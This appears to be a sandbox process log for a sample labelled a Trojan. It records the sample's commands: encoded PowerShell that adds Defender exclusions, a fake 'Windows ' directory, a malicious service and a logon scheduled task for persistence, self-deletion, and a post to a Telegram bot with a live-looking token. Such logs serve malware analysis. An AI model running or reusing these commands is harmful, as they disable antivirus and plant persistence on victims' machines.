    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"
    Source: C:\Windows \System32\printui.exeProcess created: C:\Users\user\Desktop\curlapp64.exe "C:\Users\user\Desktop\curlapp64.exe"
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c rmdir /s /q "C:\Windows \"
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\curlapp64.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c rmdir /s /q "C:\Windows \"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\curlapp64.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x882081 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x882081\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x882081.dat" /f && sc start x882081
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x882081 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x882081\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x882081.dat" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start x882081
    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k DcomLaunch
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
    Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\bav64.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bav64.exe "C:\Windows\System32\bav64.exe"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\'"
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@965969: Installed success.'});"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@965969: Installed success.'});"
    Source: unknownProcess created: C:\Windows\System32\console_zero.exe C:\Windows\System32\console_zero.exe
    Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users\'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users\'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\ProgramData'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\ProgramData'"
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 14 /nobreak
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows\System32\usvcldr64.dat"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 16 /nobreak
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Windows\TEMP\'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Windows\TEMP\'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'colorcpl.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'colorcpl.exe'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'dllhost.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'dllhost.exe'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'notepad.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'notepad.exe'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'regasm.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'regasm.exe'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'RegAsm.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'RegAsm.exe'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'regsvr32.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'regsvr32.exe'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'rundll32.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'rundll32.exe'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'sndvol.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'sndvol.exe'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'wscript.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'wscript.exe'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'svchost.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'svchost.exe'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Windows\System32\bav64.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Users\user\Desktop\curlapp64.exe"Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\curlapp64.exe "C:\Users\user\Desktop\curlapp64.exe" Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreakJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"Jump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows \System32\printui.exe"Jump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\curlapp64.exe"Jump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c rmdir /s /q "C:\Windows \"Jump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"Jump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\curlapp64.exe"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe" Jump to behavior
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"Jump to behavior
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"Jump to behavior
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x882081 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x882081\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x882081.dat" /f && sc start x882081Jump to behavior
    Source: C:\Windows \System32\printui.exeProcess created: C:\Users\user\Desktop\curlapp64.exe "C:\Users\user\Desktop\curlapp64.exe" Jump to behavior
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\bav64.exe"Jump to behavior
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@965969: Installed success.'});"Jump to behavior
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \"Jump to behavior
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows\System32\usvcldr64.dat"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreakJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"Jump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c rmdir /s /q "C:\Windows \"Jump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"Jump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\curlapp64.exe"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreakJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x882081 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x882081\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x882081.dat" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start x882081
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
    Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bav64.exe "C:\Windows\System32\bav64.exe"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users\'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\ProgramData'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Windows\TEMP\'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'colorcpl.exe'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'notepad.exe'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'regasm.exe'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'RegAsm.exe'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'regsvr32.exe'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'rundll32.exe'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'sndvol.exe'"
